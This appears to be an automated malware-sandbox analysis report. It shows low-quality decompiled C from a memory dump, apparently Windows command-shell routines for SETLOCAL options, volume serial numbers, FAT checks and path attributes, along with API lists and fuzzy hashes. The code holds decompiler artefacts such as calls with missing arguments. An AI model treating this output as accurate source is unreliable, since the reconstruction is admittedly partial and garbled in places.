                                              • Instruction Fuzzy Hash: B151C4716202599AEB24AB74EC59FBB77E8FF00310F1486AEE445D6190EF708E95CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002AC430, Relevance: 18.2, APIs: 8, Strings: 4, Instructions: 155memoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 20%
                                              			E002AC430() {
				intOrPtr _v8;
				void* __ecx;
				intOrPtr _t21;
				char _t22;
				intOrPtr _t25;
				intOrPtr _t33;
				intOrPtr _t37;
				char _t40;
				void* _t47;
				intOrPtr* _t50;
				void* _t53;
				intOrPtr _t54;
				void* _t65;
				void* _t68;
				void* _t73;
				intOrPtr* _t77;
				intOrPtr* _t78;
				void* _t83;

				_t46 = _t83;
				_push(_t47);
				_push(_t47);
				_v8 =  *((intOrPtr*)(_t83 + 4));
				_t21 =  *0x2e3cc4;
				if(_t21 == 0) {
					L19:
					_t22 = 0;
				} else {
					if( *((intOrPtr*)(_t21 + 0x14)) >= 0x20) {
						_push(0);
						_push(0x4000271c);
						E002AC5A2(_t47);
						goto L24;
					} else {
						_t50 =  *0x2e3cb8;
						if(_t50 == 0) {
							_t50 = 0x2e3ab0;
						}
						_t68 = _t50 + 2;
						do {
							_t25 =  *_t50;
							_t50 = _t50 + 2;
						} while (_t25 != 0);
						_t73 = (_t50 - _t68 >> 1) + 1;
						_t77 = HeapAlloc(GetProcessHeap(), 8, 0xc);
						if(_t77 == 0) {
							L24:
							_t22 = 1;
						} else {
							_t53 = HeapAlloc(GetProcessHeap(), 8, _t73 + _t73);
							 *_t77 = _t53;
							if(_t53 == 0) {
								goto L24;
							} else {
								_t31 =  *0x2e3cb8;
								if( *0x2e3cb8 == 0) {
									_t31 = 0x2e3ab0;
								}
								E002B1040(_t53, _t73, _t31);
								_t33 = E002B3B2C(_t53);
								 *((intOrPtr*)(_t77 + 4)) = _t33;
								if(_t33 == 0) {
									goto L24;
								} else {
									_t54 =  *0x2e3cc4;
									 *((char*)(_t77 + 8)) =  *0x2e3cc9;
									 *((char*)(_t77 + 9)) =  *0x2e3cc8;
									 *((intOrPtr*)(_t54 + 0x90 +  *(_t54 + 0x14) * 4)) = _t77;
									_t37 =  *0x2e3cd8;
									 *(_t54 + 0x14) =  *(_t54 + 0x14) + 1;
									 *((intOrPtr*)(_t54 + 0xc)) = _t37;
									if( *((intOrPtr*)(_t54 + 0x10)) < _t37) {
										 *((intOrPtr*)(_t54 + 0x10)) = _t37;
									}
									_t78 = E002AEA40( *((intOrPtr*)( *((intOrPtr*)(_t46 + 8)) + 0x3c)), 0, 0);
									_t40 = 0;
									 *0x2db8b0 = 0;
									while( *_t78 != _t40) {
										__imp___wcsicmp(_t78, L"ENABLEEXTENSIONS");
										if(_t40 != 0) {
											__imp___wcsicmp(_t78, L"DISABLEEXTENSIONS");
											if(_t40 == 0) {
												 *0x2e3cc9 = 0;
												goto L15;
											} else {
												__imp___wcsicmp(_t78, L"ENABLEDELAYEDEXPANSION");
												if(_t40 != 0) {
													__imp___wcsicmp(L"DISABLEDELAYEDEXPANSION");
													_t65 = _t78;
													if(_t40 != 0) {
														if( *_t78 == 0) {
															goto L15;
														} else {
															_push(0);
															_push(0x400023a6);
															E002AC5A2(_t65);
															_t22 = 1;
															 *0x2db8b0 = 1;
														}
													} else {
														 *0x2e3cc8 = _t40;
														goto L15;
													}
												} else {
													 *0x2e3cc8 = 1;
													goto L15;
												}
											}
										} else {
											 *0x2e3cc9 = 1;
											L15:
											_t78 = E002AD7E6(_t78);
											_t40 = 0;
											continue;
										}
										goto L20;
									}
									goto L19;
								}
							}
						}
					}
				}
				L20:
				return _t22;
			}





















                                              0x002ac433
                                              0x002ac435
                                              0x002ac436
                                              0x002ac441
                                              0x002ac447
                                              0x002ac450
                                              0x002ac58c
                                              0x002ac58c
                                              0x002ac456
                                              0x002ac45a
                                              0x002ba90c
                                              0x002ba90e
                                              0x002ba913
                                              0x00000000
                                              0x002ac460
                                              0x002ac460
                                              0x002ac468
                                              0x002ba902
                                              0x002ba902
                                              0x002ac46e
                                              0x002ac473
                                              0x002ac473
                                              0x002ac476
                                              0x002ac479
                                              0x002ac486
                                              0x002ac496
                                              0x002ac49a
                                              0x002ba91a
                                              0x002ba91c
                                              0x002ac4a0
                                              0x002ac4b3
                                              0x002ac4b5
                                              0x002ac4b9
                                              0x00000000
                                              0x002ac4bf
                                              0x002ac4bf
                                              0x002ac4c6
                                              0x002ba922
                                              0x002ba922
                                              0x002ac4cf
                                              0x002ac4d4
                                              0x002ac4d9
                                              0x002ac4de
                                              0x00000000
                                              0x002ac4e4
                                              0x002ac4e4
                                              0x002ac4ef
                                              0x002ac4f7
                                              0x002ac4fd
                                              0x002ac504
                                              0x002ac509
                                              0x002ac50c
                                              0x002ac512
                                              0x002ac514
                                              0x002ac514
                                              0x002ac527
                                              0x002ac529
                                              0x002ac52b
                                              0x002ac56c
                                              0x002ac577
                                              0x002ac581
                                              0x002ac538
                                              0x002ac542
                                              0x002ac59b
                                              0x00000000
                                              0x002ac544
                                              0x002ac54a
                                              0x002ac554
                                              0x002ba932
                                              0x002ba939
                                              0x002ba93c
                                              0x002ba94d
                                              0x00000000
                                              0x002ba953
                                              0x002ba953
                                              0x002ba954
                                              0x002ba959
                                              0x002ba961
                                              0x002ba963
                                              0x002ba963
                                              0x002ba93e
                                              0x002ba93e
                                              0x00000000
                                              0x002ba93e
                                              0x002ac55a
                                              0x002ac55a
                                              0x00000000
                                              0x002ac55a
                                              0x002ac554
                                              0x002ac583
                                              0x002ac583
                                              0x002ac561
                                              0x002ac568
                                              0x002ac56a
                                              0x00000000
                                              0x002ac56a
                                              0x00000000
                                              0x002ac581
                                              0x00000000
                                              0x002ac56c
                                              0x002ac4de
                                              0x002ac4b9
                                              0x002ac49a
                                              0x002ac45a
                                              0x002ac58e
                                              0x002ac596

                                              APIs
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,0000000C), ref: 002AC489
                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 002AC490
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000), ref: 002AC4A6
                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 002AC4AD
                                              • _wcsicmp.MSVCRT ref: 002AC538
                                              • _wcsicmp.MSVCRT ref: 002AC54A
                                              • _wcsicmp.MSVCRT ref: 002AC577
                                              • _wcsicmp.MSVCRT ref: 002BA932
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Heap_wcsicmp$AllocProcess
                                              • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                              • API String ID: 435930816-3086019870
                                              • Opcode ID: 8c40d0872b9a4005a6aef0489b2992ee491a0f6665b6d17e20c0cc2db951c747
                                              • Instruction ID: 408dceb8ce9c0c6d7c49fdcda826013bf7531dfc9bb6752fe61d0299fd8aec25
                                              • Opcode Fuzzy Hash: 8c40d0872b9a4005a6aef0489b2992ee491a0f6665b6d17e20c0cc2db951c747
                                              • Instruction Fuzzy Hash: 465147316642829BD714EF38BC4D9B737E4EB0A310734446FE846DB281EF21E961DB65
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002CA834, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 251COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 65%
                                              			E002CA834(intOrPtr __ecx, DWORD* __edx) {
				signed int _v8;
				char _v524;
				int _v532;
				char _v536;
				int _v540;
				void _v1060;
				long _v1068;
				char _v1072;
				int _v1076;
				void _v1596;
				int _v1604;
				char _v1608;
				void* _v1612;
				void _v2132;
				intOrPtr _v2136;
				intOrPtr _v2140;
				signed short _v2142;
				long _v2144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t65;
				intOrPtr _t98;
				WCHAR* _t102;
				short* _t104;
				WCHAR* _t105;
				DWORD* _t107;
				signed short _t108;
				DWORD* _t120;
				void* _t131;
				WCHAR* _t133;
				short* _t134;
				WCHAR* _t136;
				short* _t138;
				intOrPtr* _t142;
				signed int _t144;
				DWORD* _t146;
				signed int _t148;

				_t141 = __edx;
				_t65 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t65 ^ _t148;
				_v2136 = __ecx;
				_t146 = 0;
				_v1604 = 0x104;
				_v1612 = 0;
				_t120 = 1;
				_t145 = __edx;
				_v1608 = 1;
				memset( &_v2132, 0, 0x104);
				_v1076 = 0;
				_v1072 = 1;
				_v1068 = 0x104;
				memset( &_v1596, 0, 0x104);
				_v540 = 0;
				_v536 = 1;
				_v532 = 0x104;
				memset( &_v1060, 0, 0x104);
				_t122 =  &_v2132;
				if(E002B0C70( &_v2132, ((0 | _v1608 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L46:
					_push(_t146);
					_push(8);
					E002AC5A2(_t122);
					_t146 = _t120;
					L47:
					_t120 = _t146;
					L48:
					_t147 = _t120;
					L49:
					__imp__??_V@YAXPAX@Z(_v540);
					__imp__??_V@YAXPAX@Z(_v1076);
					__imp__??_V@YAXPAX@Z();
					return E002B6FD0(_t147, _t120, _v8 ^ _t148, _t141, _t145, _t147, _v1612);
				}
				_t122 =  &_v1596;
				if(E002B0C70( &_v1596, ((0 | _v1072 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					goto L46;
				}
				_t122 =  &_v1060;
				if(E002B0C70( &_v1060, ((0 | _v536 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					goto L46;
				}
				E002B0D89(_t141, _t145);
				_t131 = _v1612;
				_t142 = _t131;
				if(_t131 == 0) {
					_t142 =  &_v2132;
				}
				_t145 = _t142 + 2;
				do {
					_t98 =  *_t142;
					_t142 = _t142 + 2;
				} while (_t98 != _t146);
				_t99 = _v540;
				_t144 = _t142 - _t145 >> 1;
				if(_v540 == 0) {
					_t99 =  &_v1060;
				}
				if(_t131 == 0) {
					_t131 =  &_v2132;
				}
				_t141 = _t144 + 1;
				if(E002B4C89(_t131, _t144 + 1, _t99, _v532) == 0) {
					goto L47;
				} else {
					E002B0CF2(_t141, "\\");
					_t133 = _v1076;
					if(_t133 == 0) {
						_t133 =  &_v1596;
					}
					_t102 = _v540;
					if(_t102 == 0) {
						_t102 =  &_v1060;
					}
					_t141 =  &_v2144;
					if(GetVolumeInformationW(_t102, _t133, _v1068,  &_v2144, _t146, _t146, _t146, _t146) != 0) {
						_t104 = _v540;
						_t134 = _t104;
						if(_t104 == 0) {
							_t134 =  &_v1060;
						}
						if( *_t134 != 0x5c) {
							if(_t104 == 0) {
								_t104 =  &_v1060;
							}
							 *((short*)(_t104 + 2)) = 0;
							goto L31;
						} else {
							if(_t104 == 0) {
								_t104 =  &_v1060;
							}
							_t138 = _t104;
							while( *_t104 != _t146) {
								_t138 = _t104;
								_t104 = _t104 + 2;
							}
							 *_t138 = 0;
							L31:
							_t105 = _v1076;
							_t136 = _t105;
							if(_t105 == 0) {
								_t136 =  &_v1596;
							}
							if( *_t136 == _t146) {
								_t106 = _v540;
								if(_v540 == 0) {
									_t106 =  &_v1060;
								}
								_t145 = _v2136;
								_t107 = E002C7C83(_t120, _t141, _v2136, 0x235e, _t120, _t106);
							} else {
								if(_t105 == 0) {
									_t105 =  &_v1596;
								}
								_t137 = _v540;
								if(_v540 == 0) {
									_t137 =  &_v1060;
								}
								_t145 = _v2136;
								_push(_t105);
								_t107 = E002C7C83(_t120, _t141, _v2136, 0x235f, 2, _t137);
							}
							_t147 = _t107;
							if(_t107 == 0) {
								_t108 = _v2144;
								if(_t108 != 0 || _v2140 != _t108) {
									_push(_t108 & 0x0000ffff);
									E002B274C( &_v524, 0x100, L"%04X-%04X", _v2142 & 0x0000ffff);
									_t147 = E002C7C83(_t120, _t141, _t145, 0x235b, _t120,  &_v524);
								}
							}
							goto L49;
						}
					} else {
						if(GetLastError() == 0x90) {
							goto L47;
						}
						_push(_t146);
						_push(GetLastError());
						E002AC5A2(_t133);
						goto L48;
					}
				}
			}









































                                              0x002ca834
                                              0x002ca83f
                                              0x002ca846
                                              0x002ca851
                                              0x002ca858
                                              0x002ca85a
                                              0x002ca862
                                              0x002ca86e
                                              0x002ca871
                                              0x002ca873
                                              0x002ca879
                                              0x002ca881
                                              0x002ca88c
                                              0x002ca892
                                              0x002ca8a1
                                              0x002ca8a9
                                              0x002ca8b4
                                              0x002ca8ba
                                              0x002ca8c9
                                              0x002ca8d0
                                              0x002ca8f5
                                              0x002cab2f
                                              0x002cab2f
                                              0x002cab30
                                              0x002cab32
                                              0x002cab39
                                              0x002cab3b
                                              0x002cab3b
                                              0x002cab3d
                                              0x002cab3d
                                              0x002cab3f
                                              0x002cab45
                                              0x002cab52
                                              0x002cab5f
                                              0x002cab78
                                              0x002cab78
                                              0x002ca8fd
                                              0x002ca91f
                                              0x00000000
                                              0x00000000
                                              0x002ca927
                                              0x002ca949
                                              0x00000000
                                              0x00000000
                                              0x002ca956
                                              0x002ca95b
                                              0x002ca961
                                              0x002ca965
                                              0x002ca967
                                              0x002ca967
                                              0x002ca96d
                                              0x002ca970
                                              0x002ca970
                                              0x002ca973
                                              0x002ca976
                                              0x002ca97b
                                              0x002ca983
                                              0x002ca987
                                              0x002ca989
                                              0x002ca989
                                              0x002ca991
                                              0x002ca993
                                              0x002ca993
                                              0x002ca99f
                                              0x002ca9a8
                                              0x00000000
                                              0x002ca9ae
                                              0x002ca9b9
                                              0x002ca9be
                                              0x002ca9c6
                                              0x002ca9c8
                                              0x002ca9c8
                                              0x002ca9ce
                                              0x002ca9d6
                                              0x002ca9d8
                                              0x002ca9d8
                                              0x002ca9e2
                                              0x002ca9f9
                                              0x002caa20
                                              0x002caa26
                                              0x002caa2a
                                              0x002caa2c
                                              0x002caa2c
                                              0x002caa36
                                              0x002caa59
                                              0x002caa5b
                                              0x002caa5b
                                              0x002caa63
                                              0x00000000
                                              0x002caa38
                                              0x002caa3a
                                              0x002caa3c
                                              0x002caa3c
                                              0x002caa42
                                              0x002caa4b
                                              0x002caa46
                                              0x002caa48
                                              0x002caa48
                                              0x002caa52
                                              0x002caa67
                                              0x002caa67
                                              0x002caa6d
                                              0x002caa71
                                              0x002caa73
                                              0x002caa73
                                              0x002caa7c
                                              0x002caab2
                                              0x002caaba
                                              0x002caabc
                                              0x002caabc
                                              0x002caac2
                                              0x002caad0
                                              0x002caa7e
                                              0x002caa80
                                              0x002caa82
                                              0x002caa82
                                              0x002caa88
                                              0x002caa90
                                              0x002caa92
                                              0x002caa92
                                              0x002caa98
                                              0x002caa9e
                                              0x002caaa8
                                              0x002caaad
                                              0x002caad8
                                              0x002caadc
                                              0x002caade
                                              0x002caae6
                                              0x002caaf3
                                              0x002cab0d
                                              0x002cab2b
                                              0x002cab2b
                                              0x002caae6
                                              0x00000000
                                              0x002caadc
                                              0x002ca9fb
                                              0x002caa06
                                              0x00000000
                                              0x00000000
                                              0x002caa0c
                                              0x002caa13
                                              0x002caa14
                                              0x00000000
                                              0x002caa1a
                                              0x002ca9f9

                                              APIs
                                              • memset.MSVCRT ref: 002CA879
                                              • memset.MSVCRT ref: 002CA8A1
                                              • memset.MSVCRT ref: 002CA8C9
                                                • Part of subcall function 002B0C70: ??_V@YAXPAX@Z.MSVCRT ref: 002B0CBA
                                                • Part of subcall function 002B0C70: memset.MSVCRT ref: 002B0CDD
                                              • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000,002A21E8,?,?,?,-00000105,-00000105,-00000105), ref: 002CA9F1
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?), ref: 002CA9FB
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?), ref: 002CAA0D
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002CAB45
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002CAB52
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002CAB5F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: memset$ErrorLast$InformationVolume
                                              • String ID: %04X-%04X
                                              • API String ID: 2748242238-1126166780
                                              • Opcode ID: fe46eecb6f0659fe5c94b6a51221447b650be6c542c0de45c3ab67bba49d471f
                                              • Instruction ID: 4f6934279f00b798e423063f80d5eba2f583007f6642b8f751771de1330abf87
                                              • Opcode Fuzzy Hash: fe46eecb6f0659fe5c94b6a51221447b650be6c542c0de45c3ab67bba49d471f
                                              • Instruction Fuzzy Hash: F491A1B1A1122D9ADB24DA24CC85FEA77B9EF54348F4402DEF509E3141EA349FA4CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B3121, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 167COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 66%
                                              			E002B3121(void* __ecx, void* __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				long _v556;
				char _v560;
				int _v564;
				void _v1084;
				int _v1092;
				char _v1096;
				void* _v1100;
				void _v1620;
				long _v1624;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t47;
				WCHAR* _t64;
				WCHAR* _t84;
				signed int _t86;
				void* _t87;
				WCHAR* _t89;
				WCHAR* _t102;
				void* _t110;
				void* _t111;
				signed int _t112;

				_t109 = __edx;
				_t47 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t47 ^ _t112;
				_v560 = 1;
				_t89 = 0;
				_v556 = 0x104;
				_v564 = 0;
				_t111 = __edx;
				_t110 = __ecx;
				memset( &_v1084, 0, 0x104);
				_v28 = 0;
				_v24 = 1;
				_v20 = 0x104;
				memset( &_v548, 0, 0x104);
				_v1100 = 0;
				_v1096 = 1;
				_v1092 = 0x104;
				memset( &_v1620, 0, 0x104);
				if(E002B0C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E002B0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E002B0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					 *0x2e3cf0 = 8;
					_t64 = _t89;
					goto L21;
				} else {
					_t79 = _v1100;
					 *0x2e3cf0 = 0;
					if(_v1100 == 0) {
						_t79 =  &_v1620;
					}
					_t109 = _t111;
					if(E002B4C89(_t110, _t111, _t79, _v1092) != 0) {
						_t81 = _v1100;
						if(_v1100 == 0) {
							_t81 =  &_v1620;
						}
						E002B0D89(_t109, _t81);
						E002B0CF2(_t109, "\\");
						_t102 = _v564;
						if(_t102 == 0) {
							_t102 =  &_v1084;
						}
						_t84 = _v28;
						if(_t84 == 0) {
							_t84 =  &_v548;
						}
						if(GetVolumeInformationW(_t84, _t89, _t89, _t89,  &_v1624, _t89, _t102, _v556) == 0) {
							_t86 = GetLastError();
							_t46 = _t86 - 0x90; // -144
							asm("sbb ecx, ecx");
							 *0x2e3cf0 =  ~_t46 & _t86;
						} else {
							_t87 = _v564;
							if(_t87 == 0) {
								_t87 =  &_v1084;
							}
							__imp___wcsicmp(_t87, L"FAT");
							if(_t87 == 0) {
								if(_v1624 == 0xc) {
									_t64 = 1;
									L21:
									_t89 = _t64;
								}
							}
						}
					}
				}
				__imp__??_V@YAXPAX@Z(_v1100);
				__imp__??_V@YAXPAX@Z(_v28);
				__imp__??_V@YAXPAX@Z();
				return E002B6FD0(_t89, _t89, _v8 ^ _t112, _t109, _t110, _t111, _v564);
			}






























                                              0x002b3121
                                              0x002b312c
                                              0x002b3133
                                              0x002b313e
                                              0x002b3146
                                              0x002b3148
                                              0x002b3154
                                              0x002b315c
                                              0x002b315e
                                              0x002b3160
                                              0x002b3168
                                              0x002b3170
                                              0x002b3174
                                              0x002b3180
                                              0x002b3188
                                              0x002b3193
                                              0x002b319a
                                              0x002b31a9
                                              0x002b31d5
                                              0x002bdbf0
                                              0x002bdbfa
                                              0x00000000
                                              0x002b3229
                                              0x002b3229
                                              0x002b322f
                                              0x002b3237
                                              0x002b3239
                                              0x002b3239
                                              0x002b3245
                                              0x002b3251
                                              0x002b3257
                                              0x002b325f
                                              0x002b3261
                                              0x002b3261
                                              0x002b326e
                                              0x002b327e
                                              0x002b3283
                                              0x002b328b
                                              0x002bdbb6
                                              0x002bdbb6
                                              0x002b3291
                                              0x002b3296
                                              0x002b3310
                                              0x002b3310
                                              0x002b32b3
                                              0x002bdbd3
                                              0x002bdbd9
                                              0x002bdbe1
                                              0x002bdbe5
                                              0x002b32b9
                                              0x002b32b9
                                              0x002b32c1
                                              0x002b3318
                                              0x002b3318
                                              0x002b32c9
                                              0x002b32d3
                                              0x002bdbc8
                                              0x002bdbd0
                                              0x002bdbfc
                                              0x002bdbfc
                                              0x002bdbfc
                                              0x002bdbc8
                                              0x002b32d3
                                              0x002b32b3
                                              0x002b3251
                                              0x002b32df
                                              0x002b32e9
                                              0x002b32f6
                                              0x002b330f

                                              APIs
                                              • memset.MSVCRT ref: 002B3160
                                              • memset.MSVCRT ref: 002B3180
                                              • memset.MSVCRT ref: 002B31A9
                                                • Part of subcall function 002B0C70: ??_V@YAXPAX@Z.MSVCRT ref: 002B0CBA
                                                • Part of subcall function 002B0C70: memset.MSVCRT ref: 002B0CDD
                                              • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,00000000,?,?,002A21E8,?,?,?,-00000105,-00000105,-00000105), ref: 002B32AB
                                              • _wcsicmp.MSVCRT ref: 002B32C9
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002B32DF
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002B32E9
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002B32F6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: memset$InformationVolume_wcsicmp
                                              • String ID: FAT
                                              • API String ID: 4247940253-238207945
                                              • Opcode ID: 347c5721e8a9fd539fe5deff93e9366c4a4db443c8ab5146035503b3f8236db1
                                              • Instruction ID: 4ebd1a1678bf81dc6856b4ca86d4346de40190269345ac7de25a5993289cfb27
                                              • Opcode Fuzzy Hash: 347c5721e8a9fd539fe5deff93e9366c4a4db443c8ab5146035503b3f8236db1
                                              • Instruction Fuzzy Hash: 6B5161B19202599BDB14CF64DC89BEE77B8EB04384F0401EAE909E7151EB759F94CF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002AAD44, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 152COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 79%
                                              			E002AAD44(WCHAR* __ecx) {
				signed int _v8;
				void* _v608;
				long _v612;
				char _v616;
				int _v620;
				void* _v624;
				void _v1140;
				WCHAR* _v1144;
				WCHAR* _v1148;
				void* _v1152;
				void* _v1164;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t34;
				WCHAR* _t45;
				int _t48;
				wchar_t* _t49;
				long _t50;
				intOrPtr* _t51;
				signed int _t57;
				void* _t59;
				void* _t60;
				signed int _t61;
				WCHAR* _t62;
				void* _t78;
				void* _t81;
				signed int _t82;
				WCHAR* _t84;
				void* _t85;
				WCHAR* _t86;
				wchar_t* _t87;
				signed int _t89;
				signed int _t91;

				_t91 = (_t89 & 0xfffffff8) - 0x47c;
				_t32 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t32 ^ _t91;
				_push(_t59);
				_t84 = __ecx;
				_v1144 = __ecx;
				if(__ecx == 0) {
					_t34 = 0;
					L11:
					_pop(_t81);
					_pop(_t85);
					_pop(_t60);
					return E002B6FD0(_t34, _t60, _v8 ^ _t91, _t79, _t81, _t85);
				}
				_v616 = 1;
				_t82 = 0;
				_v612 = 0x104;
				_v620 = 0;
				memset( &_v1140, 0, 0x104);
				_t91 = _t91 + 0xc;
				if(E002B0C70( &_v1140, ((0 | _v616 == 0x00000000) - 0x00000001 & 0x0000fdc6) + 0x208) < 0) {
					L10:
					__imp__??_V@YAXPAX@Z(_v620);
					_t34 = _t82;
					goto L11;
				}
				_t45 = _v620;
				if(_t45 == 0) {
					_t45 =  &_v1140;
				}
				_t61 = GetFullPathNameW(E002B22C0(_t59, _t84), _v612, _t45,  &_v1148);
				if(_t61 == 0) {
					L9:
					_t82 = _t61;
					goto L10;
				} else {
					_t86 = _v620;
					if(_t86 == 0) {
						_t86 =  &_v1140;
					}
					_t48 = wcsncmp(_t86, L"\\\\.\\", 4);
					_t91 = _t91 + 0xc;
					if(_t48 == 0) {
						_t62 = _v1144;
						_t87 =  &(_t86[4]);
						_v1148 = _t87;
						_t49 = wcsstr(_t62, _t87);
						_v1148 = _t49;
						if(_t49 == 0 || _t49 <= _t62) {
							_t50 = GetFileAttributesW(_t62);
						} else {
							 *_t49 = 0;
							_t50 = GetFileAttributesW(_t62);
							 *_v1148 =  *_t49 & 0x0000ffff;
						}
						if(_t50 != 0xffffffff) {
							_t82 = _t50;
						}
						goto L10;
					} else {
						_t51 = _v1148;
						if(_t51 == 0 ||  *_t51 == _t82) {
							_t61 = 0 | GetFileAttributesW(_t86) != 0xffffffff;
						} else {
							_t79 = _t86;
							_t61 = E002B68BA(E002B6A00, _t86, 0x37, _t82, _t91 + 0x234,  &_v1144) & 0x000000ff;
							E002ACD27( *((intOrPtr*)(_t91 + 0x14)));
							if(_t61 == 0) {
								_t57 = _t86[1] & 0x0000ffff;
								_t78 = 0x5c;
								if(_t57 == _t78 || _t57 == 0x3a && _t86[2] == _t78 && _t86[3] == _t82) {
									if(GetDriveTypeW(_t86) > 1) {
										_t61 = 1;
									}
								}
							}
						}
						goto L9;
					}
				}
			}






































                                              0x002aad4c
                                              0x002aad52
                                              0x002aad59
                                              0x002aad60
                                              0x002aad62
                                              0x002aad64
                                              0x002aad6b
                                              0x002aaeac
                                              0x002aae71
                                              0x002aae78
                                              0x002aae79
                                              0x002aae7a
                                              0x002aae85
                                              0x002aae85
                                              0x002aad76
                                              0x002aad7f
                                              0x002aad81
                                              0x002aad8c
                                              0x002aad95
                                              0x002aada0
                                              0x002aadc0
                                              0x002aae61
                                              0x002aae68
                                              0x002aae6f
                                              0x00000000
                                              0x002aae6f
                                              0x002aadc6
                                              0x002aadcf
                                              0x002c122a
                                              0x002c122a
                                              0x002aadf0
                                              0x002aadf4
                                              0x002aae5f
                                              0x002aae5f
                                              0x00000000
                                              0x002aadf6
                                              0x002aadf6
                                              0x002aadff
                                              0x002c1233
                                              0x002c1233
                                              0x002aae0d
                                              0x002aae13
                                              0x002aae18
                                              0x002c123c
                                              0x002c1240
                                              0x002c1245
                                              0x002c1249
                                              0x002c124f
                                              0x002c1257
                                              0x002c1276
                                              0x002c125d
                                              0x002c1263
                                              0x002c1266
                                              0x002c1270
                                              0x002c1270
                                              0x002c127f
                                              0x002c1285
                                              0x002c1285
                                              0x00000000
                                              0x002aae1e
                                              0x002aae1e
                                              0x002aae24
                                              0x002c12b0
                                              0x002aae33
                                              0x002aae37
                                              0x002aae53
                                              0x002aae56
                                              0x002aae5d
                                              0x002aae86
                                              0x002aae8c
                                              0x002aae90
                                              0x002c1296
                                              0x002c129e
                                              0x002c129e
                                              0x002c1296
                                              0x002aae90
                                              0x002aae5d
                                              0x00000000
                                              0x002aae24
                                              0x002aae18

                                              APIs
                                              • memset.MSVCRT ref: 002AAD95
                                                • Part of subcall function 002B0C70: ??_V@YAXPAX@Z.MSVCRT ref: 002B0CBA
                                                • Part of subcall function 002B0C70: memset.MSVCRT ref: 002B0CDD
                                              • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,-00000209,00000000,?,00000001), ref: 002AADEA
                                              • wcsncmp.MSVCRT(?,\\.\,00000004), ref: 002AAE0D
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002AAE68
                                              • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000037,00000000,?,?), ref: 002C128D
                                                • Part of subcall function 002B22C0: wcschr.MSVCRT ref: 002B22CC
                                              • wcsstr.MSVCRT ref: 002C1249
                                              • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 002C1266
                                              • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 002C12A5
                                                • Part of subcall function 002B68BA: FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000037,00000000,00000000,00000002,00000000,?,00000000,002B6A00,002B6A00,?,002AAE4F,00000037,00000000,?), ref: 002B68E6
